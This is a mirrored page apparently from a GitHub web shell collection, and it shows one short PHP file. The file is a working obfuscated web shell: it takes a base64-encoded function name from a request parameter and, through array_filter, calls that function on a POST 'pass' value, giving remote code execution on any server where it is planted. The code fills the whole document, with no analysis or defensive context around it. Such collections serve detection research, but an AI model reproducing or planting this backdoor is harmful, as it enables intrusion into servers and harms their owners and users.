mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
6 lines
112 B
PHP
6 lines
112 B
PHP
|
<?php
|
||
|
$e = $_REQUEST['e'];
|
||
|
$arr = array($_POST['pass'],);
|
||
|
array_filter($arr, base64_decode($e));
|
||
|
?>
|